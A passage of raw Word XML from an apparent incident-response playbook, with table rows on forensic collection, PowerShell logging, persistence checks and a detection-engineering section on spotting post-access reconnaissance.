            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="7B0B6099" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Capture Forensics (Memory + Disk)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="7E85D9B2" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Useful if you suspect in-memory techniques (e.g., fileless PowerShell, Cobalt Strike beacons)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="432C3C3A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="69834961" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Collect and Analyze Execution Artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6CA2F8B5" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Get the script, binary, or tool that executed the technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="08AE96F2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1020"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="130F5C4F" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Enable PowerShell Logging (if not already)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4F54F101" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>ScriptBlockLogging</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>ModuleLogging</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> (especially helpful for 1518.001)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="5E8357F9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="700"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="2CE184C0" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Check WMI Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="62AE947D" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Especially if commands like </w:t>
            </w:r>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>wmic</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> were involved</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="2426A668" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1020"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6FD2E01E" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Audit Scheduled Tasks and Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="07ECD7FC" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Attackers may establish persistence via these after discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="5109FCF2" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="79CA9EAC" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Inspect other host </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>CommandLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>ParentCommandLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="6D3623D8" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Look for lateral movement staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="46BCB84F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="457CCDF1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0081210C" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1B8F84ED" w14:textId="3FEDB283">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890131" w:id="15"/>
      <w:r>
        <w:t>3.7 Detection Engineering</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="50069FDB" w14:textId="77777777"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="80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540"/>
        <w:gridCol w:w="4555"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="5331199D" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="569FE067" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="4E70A9DB" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="2CAEC689" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1020"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1DB07AD2" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Create detection for Invoke-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AtomicTest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve"> or equivalent recon patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="16649B84" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Prevent future recon from going unnoticed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="18E6D535" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4803365C" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Create a detection for AV keyword filtering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="3E4930ED" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>High-fidelity signal of post-access recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="604D24F4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1020"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6A8E1550" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
